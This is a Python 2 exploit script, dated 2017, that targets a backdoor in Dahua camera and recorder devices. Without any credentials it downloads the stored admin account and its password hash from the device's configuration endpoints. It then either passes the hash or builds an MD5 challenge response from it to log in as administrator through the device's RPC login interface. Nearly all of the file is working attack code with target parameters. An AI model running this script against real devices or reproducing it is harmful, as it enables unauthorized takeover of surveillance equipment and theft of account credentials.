#!/usr/bin/python2.7
# Dahua backdoor Generation 2 and 3
# Author: bashis <mcw noemail eu> March 2017
# Credentials: No credentials needed (Anonymous)
# Jacked from git history
import string
import sys
import socket
import argparse
import urllib
import urllib2
import httplib
import base64
import ssl
import json
import commentjson # pip install commentjson
import hashlib
class HTTPconnect:
def __init__(self, host, proto, verbose, creds, Raw, noexploit):
self.host = host
self.proto = proto
self.verbose = verbose
self.credentials = creds
self.Raw = Raw
self.noexploit = False
self.noexploit = noexploit
def Send(self, uri, query_headers, query_data, ID):
self.uri = uri
self.query_headers = query_headers
self.query_data = query_data
self.ID = ID
# Connect-timeout in seconds
timeout = 5
socket.setdefaulttimeout(timeout)
url = '%s://%s%s' % (self.proto, self.host, self.uri)
if self.verbose:
print "[Verbose] Sending:", url
if self.proto == 'https':
if hasattr(ssl, '_create_unverified_context'):
print "[i] Creating SSL Unverified Context"
ssl._create_default_https_context = ssl._create_unverified_context
if self.credentials:
Basic_Auth = self.credentials.split(':')
if self.verbose:
print "[Verbose] User:", Basic_Auth[0], "Password:", Basic_Auth[1]
try:
pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
except Exception as e:
print "[!] Basic Auth Error:", e
sys.exit(1)
if self.noexploit and not self.verbose:
print "[<] 204 Not Sending!"
html = "Not sending any data"
else:
if self.query_data:
req = urllib2.Request(url, data=json.dumps(
self.query_data), headers=self.query_headers)
if self.ID:
req.add_header('DhWebClientSessionID', self.ID)
else:
req = urllib2.Request(url, None, headers=self.query_headers)
if self.ID:
req.add_header('DhWebClientSessionID', self.ID)
rsp = urllib2.urlopen(req)
if rsp:
print "[<] %s OK" % rsp.code
if self.Raw:
return rsp
else:
html = rsp.read()
return html
class Dahua_Backdoor:
def __init__(self, rhost, proto, verbose, creds, Raw, noexploit):
self.rhost = rhost
self.proto = proto
self.verbose = verbose
self.credentials = creds
self.Raw = Raw
self.noexploit = False
self.noexploit = noexploit
# Generation 2
def Gen2(self, response, headers):
self.response = response
self.headers = headers
html = self.response.readlines()
for line in html:
if line[0] == "#" or line[0] == "/n":
continue
line = line.split(':')[0:25]
if line[1] == 'admin':
print "[i] Chosing Admin Login: {}, PWD hash: {}".format(line[1], line[2])
ADMIN = line[1]
PWD = line[2]
break
elif line[1] == '888888':
print "[i] Choosing Admin Login: {}, PWD hash: {}".format(line[1], line[2])
ADMIN = line[1]
PWD = line[2]
break
else:
if line[3] == '1':
print "Choosing Admin Login [{}]: {}, PWD hash: {}".format(line[0], line[1], line[2])
ADMIN = line[1]
PWD = line[2]
break
# Login 1
print "[>] Requesting our session ID"
query_args = {"method": "global.login",
"params": {
"userName": ADMIN,
"password": "",
"clientType": "Web3.0"},
"id": 10000}
URI = '/RPC2_Login'
response = HTTPconnect(self.rhost, self.proto, self.verbose, self.credentials, self.Raw, self.noexploit).Send(
URI, headers, query_args, None)
json_obj = json.load(response)
if self.verbose:
print json.dumps(json_obj, sort_keys=True, indent=4, separators=(',', ': '))
# Login 2
print "[>] Logging in"
query_args = {"method": "global.login",
"session": json_obj['session'],
"params": {
"userName": ADMIN,
"password": PWD,
"clientType": "Web3.0",
"authorityType": "OldDigest"},
"id": 10000}
URI = '/RPC2_Login'
response = HTTPconnect(self.rhost, self.proto, self.verbose, self.credentials, self.Raw, self.noexploit).Send(
URI, headers, query_args, json_obj['session'])
print response.read()
# Logout
print "[>] Logging out"
query_args = {"method": "global.logout",
"params": "null",
"session": json_obj['session'],
"id": 10001}
URI = '/RPC2'
response = HTTPconnect(self.rhost, self.proto, self.verbose, self.credentials, self.Raw, self.noexploit).Send(
URI, headers, query_args, None)
return response
# Generation 3
def Gen3(self, response, headers):
self.response = response
self.headers = headers
json_obj = commentjson.load(self.response)
if self.verbose:
print json.dumps(json_obj, sort_keys=True, indent=4, separators=(',', ': '))
for who in json_obj[json_obj.keys()[0]]:
if who['Group'] == 'admin':
USER_NAME = who['Name']
PWDDB_HASH = who['Password']
AUTH_NO = len(who['AuthorityList'])
if AUTH_NO >= 20:
print "[i] Choosing Admin Login: {}, Auth: {}".format(who['Name'], len(who['AuthorityList']))
break
# Request login
print "[>] Requesting our session ID"
query_args = {"method": "global.login",
"params": {
"userName": USER_NAME,
"password": "",
"clientType": "Web3.0"},
"id": 10000}
URI = '/RPC2_Login'
response = HTTPconnect(self.rhost, self.proto, self.verbose, self.credentials, self.Raw, self.noexploit).Send(
URI, headers, query_args, None)
json_obj = json.load(response)
if self.verbose:
print json.dumps(json_obj, sort_keys=True, indent=4, separators=(',', ': '))
RANDOM = json_obj['params']['random']
PASS = '' + USER_NAME + ':' + RANDOM + ':' + PWDDB_HASH + ''
RANDOM_HASH = hashlib.md5(PASS).hexdigest().upper()
print "[i] Downloaded MD5 hash:", PWDDB_HASH
print "[i] Random value to encrypt with:", RANDOM
print "[i] Built password:", PASS
print "[i] MD5 generated password:", RANDOM_HASH
# Login
print "[>] Logging in"
query_args = {"method": "global.login",
"session": json_obj['session'],
"params": {
"userName": USER_NAME,
"password": RANDOM_HASH,
"clientType": "Web3.0",
"authorityType": "Default"},
"id": 10000}
URI = '/RPC2_Login'
response = HTTPconnect(self.rhost, self.proto, self.verbose, self.credentials, self.Raw, self.noexploit).Send(
URI, headers, query_args, json_obj['session'])
print response.read()
# Logout
print "[>] Logging out"
query_args = {"method": "global.logout",
"params": "null",
"session": json_obj['session'],
"id": 10001}
URI = '/RPC2'
response = HTTPconnect(self.rhost, self.proto, self.verbose, self.credentials, self.Raw, self.noexploit).Send(
URI, headers, query_args, None)
return response
# Validate correctness of HOST, IP and PORT
class Validate:
def __init__(self, verbose):
self.verbose = verbose
# Check if IP is valid
def CheckIP(self, IP):
self.IP = IP
ip = self.IP.split('.')
if len(ip) != 4:
return False
for tmp in ip:
if not tmp.isdigit():
return False
i = int(tmp)
if i < 0 or i > 255:
return False
return True
# Check if PORT is valid
def Port(self, PORT):
self.PORT = PORT
if int(self.PORT) < 1 or int(self.PORT) > 65535:
return False
else:
return True
# Check if HOST is valid
def Host(self, HOST):
self.HOST = HOST
try:
# Check valid IP
# Will generate exeption if we try with DNS or invalid IP
socket.inet_aton(self.HOST)
# Now we check if it is correct typed IP
if self.CheckIP(self.HOST):
return self.HOST
else:
return False
except socket.error as e:
# Else check valid DNS name, and use the IP address
try:
self.HOST = socket.gethostbyname(self.HOST)
return self.HOST
except socket.error as e:
return False
if __name__ == '__main__':
# Help, info and pre-defined values
INFO = '[Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]\n'
HTTP = "http"
HTTPS = "https"
proto = HTTP
verbose = False
noexploit = False
raw_request = True
rhost = '192.168.5.2' # Default Remote HOST
rport = '80' # Default Remote PORT
creds = False
try:
arg_parser = argparse.ArgumentParser(
prog=sys.argv[0],
description=('[*] ' + INFO + ' [*]'))
arg_parser.add_argument(
'--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: ' + rhost + ']')
arg_parser.add_argument(
'--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: ' + rport + ']')
if creds:
arg_parser.add_argument(
'--auth', required=False, help='Basic Authentication [Default: ' + creds + ']')
arg_parser.add_argument('--https', required=False, default=False, action='store_true',
help='Use HTTPS for remote connection [Default: HTTP]')
arg_parser.add_argument('-v', '--verbose', required=False, default=False, action='store_true',
help='Verbose mode [Default: False]')
arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true',
help='Simple testmode; With --verbose testing all code without exploiting [Default: False]')
args = arg_parser.parse_args()
except Exception as e:
print(INFO, "/nError: %s/n" % str(e))
sys.exit(1)
if len(sys.argv) == 1:
arg_parser.parse_args(['-h'])
print "\n[*]", INFO
if args.verbose:
verbose = args.verbose
if args.https:
proto = HTTPS
if not args.rport:
rport = '443'
if creds and args.auth:
creds = args.auth
if args.noexploit:
noexploit = args.noexploit
if args.rport:
rport = args.rport
if args.rhost:
rhost = args.rhost
if not Validate(verbose).Port(rport):
print "[!] Invalid RPORT - Choose between 1 and 65535"
sys.exit(1)
rhost = Validate(verbose).Host(rhost)
if not rhost:
print "[!] Invalid RHOST"
sys.exit(1)
if noexploit:
print "[i] Test mode selected, no exploiting..."
if args.https:
print "[i] HTTPS / SSL Mode Selected"
print "[i] Remote target IP:", rhost
print "[i] Remote target PORT:", rport
rhost = rhost + ':' + rport
headers = {
'Connection': 'close',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Accept': '*/*',
'X-Requested-With': 'XMLHttpRequest',
'X-Request': 'JSON',
'User-Agent': 'Mozilla/5.0',
}
try:
print "[>] Checking for backdoor version"
URI = "/current_config/passwd"
response = HTTPconnect(rhost, proto, verbose, creds, raw_request, noexploit).Send(
URI, headers, None, None)
print "[!] Generation 2 found"
reponse = Dahua_Backdoor(
rhost, proto, verbose, creds, raw_request, noexploit).Gen2(response, headers)
except urllib2.HTTPError as e:
if e.code == 404:
try:
URI = '/current_config/Account1'
response = HTTPconnect(rhost, proto, verbose, creds, raw_request, noexploit).Send(URI, headers, None,
None)
print "[!] Generation 3 Found"
response = Dahua_Backdoor(rhost, proto, verbose, creds, raw_request, noexploit).Gen3(response, headers)
except urllib2.HTTPError as e:
if e.code == 404:
print "[!] Seems not to be Dahua device! ({})".format(e.code)
sys.exit(1)
else:
print "Error Code: {}".format(e.code)
except Exception as e:
print "[!] Detect of target failed (%s)" % e
sys.exit(1)
print "\n[*] All done...\n"
sys.exit(0)
评论